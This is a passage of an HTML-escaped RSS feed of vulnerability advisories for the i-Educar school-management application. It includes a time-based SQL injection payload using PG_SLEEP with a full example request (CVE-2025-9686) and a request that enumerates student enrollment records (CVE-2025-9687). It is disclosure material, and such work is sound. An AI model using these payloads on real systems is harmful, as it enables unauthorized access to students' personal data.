&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/module/AreaConhecimento/edit&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/AreaConhecimento/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /module/AreaConhecimento/edit?id=3&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 90
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: http://localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/module/AreaConhecimento/edit?id=3
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: grav-admin-flexpages=eyJyb3V0ZSI6Ii9ob21lIiwiZmlsdGVycyI6e319; grav-tabs-state={%22tab--f0e041eed24f87f2b6b02fd6924d0a08%22:%22data.languages%22%2C%22tab-flex-pages-e838602f51515c83bca06a8ae758ce52%22:%22data.security%22%2C%22tab-flex-pages-b6676b27f5cdf6b6c22f8e18da4259a0%22:%22data.advanced%22%2C%22tab-flex-pages-raw-8f0a83a672754f7823714134334b1de8%22:%22data.content%22%2C%22tab-flex-pages-dc26c564cb2116d77bda5fff24ba90dc%22:%22data.security%22%2C%22tab-flex_conf-user_groups-accounts-02f0e9f68f41a0648ed530f80bd72c06%22:%22data.cache%22%2C%22tab-flex-pages-raw-9a0364b9e99bb480dd25e1f0284c8555%22:%22data.content%22%2C%22tab-flex-pages-e91e6348157868de9dd8b25c81aebfb9%22:%22data.security%22%2C%22tab--8cc45760590da203c5fc3568ecbabd66%22:%22data.routes%22%2C%22tab--7a2ac3477f8ad14aa750831441325a16%22:%22data.facebook%22}; i_educar_session=iIw1P9Yxwm9hsXZb74mgDwRm5ltCSdmSQuuURvmG
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;tipoacao=Editar&amp;amp;amp;id=3&amp;amp;amp;instituicao=1&amp;amp;amp;nome=Educa%C3%A7%C3%A3o&#43;Infantil&amp;amp;amp;secao=&amp;amp;amp;ordenamento_ac=
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9686/image.png&amp;#34;
	width=&amp;#34;1123&amp;#34;
	height=&amp;#34;1015&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9686/image_hu_5fdd05e927141c54.png 480w, /p/cve-2025-9686/image_hu_66ab9f29ad1e9d8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;110&amp;#34;
		data-flex-basis=&amp;#34;265px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9686.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9686.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 30 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9687</title>
        <link>https://www.cvehunters.com/p/cve-2025-9687/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9687/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9687-broken-object-level-authorization-bola-allows-enumeration-of-students-via-modulehistoricoescolarprocessamentoapi&amp;#34;&amp;gt;CVE-2025-9687: Broken Object Level Authorization (BOLA) allows enumeration of students via &amp;lt;code&amp;gt;/module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9687&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9687&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Object Level Authorization (BOLA) vulnerability was identified in the &amp;lt;code&amp;gt;/module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt; endpoint of the i-Educar application.
This flaw allows low-privileged users (e.g., standard student/responsible accounts) to retrieve enrollment (&amp;lt;code&amp;gt;matriculas&amp;lt;/code&amp;gt;) information of students outside their scope, exposing Personally Identifiable Information (PII) without proper authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/br&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;code&amp;gt;GET /module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to enforce&amp;lt;b&amp;gt;object-level authorization&amp;lt;/b&amp;gt;when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9687-broken-object-level-authorization-bola-allows-enumeration-of-students-via-modulehistoricoescolarprocessamentoapi&amp;#34;&amp;gt;CVE-2025-9687: Broken Object Level Authorization (BOLA) allows enumeration of students via &amp;lt;code&amp;gt;/module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9687&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9687&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Object Level Authorization (BOLA) vulnerability was identified in the &amp;lt;code&amp;gt;/module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt; endpoint of the i-Educar application.
This flaw allows low-privileged users (e.g., standard student/responsible accounts) to retrieve enrollment (&amp;lt;code&amp;gt;matriculas&amp;lt;/code&amp;gt;) information of students outside their scope, exposing Personally Identifiable Information (PII) without proper authorization checks.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/br&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;code&amp;gt;GET /module/HistoricoEscolar/processamentoApi&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to enforce&amp;lt;b&amp;gt;object-level authorization&amp;lt;/b&amp;gt;when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user (e.g., student, professor).&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9687/image.png&amp;#34;
	width=&amp;#34;1336&amp;#34;
	height=&amp;#34;537&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9687/image_hu_f939c8d7ab530bb6.png 480w, /p/cve-2025-9687/image_hu_8ff6dd6f967a559d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;248&amp;#34;
		data-flex-basis=&amp;#34;597px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/HistoricoEscolar/processamentoApi?att=matriculas&amp;amp;amp;oper=get&amp;amp;amp;instituicao_id=1&amp;amp;amp;escola_id=4&amp;amp;amp;curso_id=3&amp;amp;amp;serie_id=5&amp;amp;amp;turma_id=23&amp;amp;amp;ano=2025&amp;amp;amp;busca=S HTTP/1.1 
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=&amp;amp;lt;low-privileged-session&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9687/image-1.png&amp;#34;
	width=&amp;#34;1567&amp;#34;
	height=&amp;#34;714&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9687/image-1_hu_226565e8d4a9024e.png 480w, /p/cve-2025-9687/image-1_hu_ac9f38053b5efe51.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;219&amp;#34;
		data-flex-basis=&amp;#34;526px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that information about the students were returned.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive PII;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Violation of data protection laws (e.g., LGPD, GDPR);&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential abuse of user data or impersonation;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;User enumeration.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9687.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9687.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 30 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9606</title>
        <link>https://www.cvehunters.com/p/cve-2025-9606/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9606/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9606-sql-injection-blind-time-based-vulnerability-in-cod_agenda-parameter-on-agenda_preferenciasphp-endpoint&amp;#34;&amp;gt;CVE-2025-9606: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;cod_agenda&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9606&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
